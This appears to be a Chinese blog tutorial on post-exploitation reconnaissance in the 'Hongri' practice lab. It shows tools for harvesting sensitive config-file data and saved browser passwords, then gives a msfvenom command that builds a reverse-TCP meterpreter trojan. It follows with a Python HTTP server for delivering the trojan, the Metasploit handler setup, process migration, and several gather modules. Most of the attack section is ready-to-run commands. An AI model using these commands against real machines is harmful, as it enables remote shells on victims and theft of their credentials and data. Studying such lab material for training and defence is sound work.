内网信息收集——MSF信息收集&浏览器记录&配置文件敏感信息


域控:windows server 2008
域内机器:win7
攻击机:kali

就是红日靶场(一)的虚拟机。

一、配置文件敏感信息收集

使用searchall64.exe,下图在win7上用的是3.5.6,3.5.9用不了,会报错。

searchall64.exe -p c:// # 收集C盘下的敏感信息

在这里插入图片描述

二、浏览器密码&记录

使用hack-browser-data-windows-64bit.exe,同样这里是在win7上运行,v0.4.3可用,v0.4.5用不了。
在这里插入图片描述

三、MSF信息收集

1、生成反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.92.6 LPORT=4444 -f exe -o reverse_shell.exe

在这里插入图片描述

2、kali开启http服务,win7下载反弹shell

python3 -m http.server 9999

3、kali开始监听(使用msf)

msfconsole                                         # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler                          # 监听木马反弹过来的shell
msset payload windows/x64/meterpreter/reverse_tcp  	   # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set lhost 192.168.92.6                          # 我们的kali本机ip
set lport 4444                                    # 我们的kali本机端口
exploit                                            # 开始进行监听;

在这里插入图片描述
在win7上运行反弹shelltest.exe,即可获取win7的shell。
在这里插入图片描述
注入到新的进程

getpid # 获取当前进程PID
ps # 查看系统进程
migrate -P <pid> # 迁移到相应pid的进程中

进入受害机shell

shell # 进入shell
chcp 65001 # 修改编码,解决控制台乱码问题

在这里插入图片描述

获取目标机器的分区信息

run post/windows/gather/forensics/enum_drives #获取目标机器的分区信息

在这里插入图片描述

判断是否是虚拟机:

run post/windows/gather/checkvm # 判断是否是虚拟机

在这里插入图片描述

开启了什么服务:

run post/windows/gather/enum_services # 开启了什么服务

在这里插入图片描述

安装了什么应用

run post/windows/gather/enum_applications # 安装了什么应用

在这里插入图片描述

获取主机最近的系统操作

post/windows/gather/dumplinks # 获取主机最近的系统操作

在这里插入图片描述

查看补丁

run post/windows/gather/enum_patches #查看补丁

在这里插入图片描述

相关推荐

  1. 信息收集总结

    2024-07-14 20:02:03       51 阅读
  2. 信息收集】 IP信息收集

    2024-07-14 20:02:03       20 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-14 20:02:03       67 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-14 20:02:03       72 阅读
  3. 在Django里面运行非项目文件

    2024-07-14 20:02:03       58 阅读
  4. Python语言-面向对象

    2024-07-14 20:02:03       69 阅读

热门阅读

  1. WPF中Frame

    2024-07-14 20:02:03       16 阅读
  2. python装饰器

    2024-07-14 20:02:03       18 阅读
  3. Linux开发:Ubuntu22.04安装libcurl4

    2024-07-14 20:02:03       17 阅读
  4. 【网站】重定向任意网站(IP)

    2024-07-14 20:02:03       20 阅读
  5. 11.FreeRTOS_事件组

    2024-07-14 20:02:03       19 阅读
  6. linux常用命令

    2024-07-14 20:02:03       16 阅读
  7. Linux 软件工具安装

    2024-07-14 20:02:03       21 阅读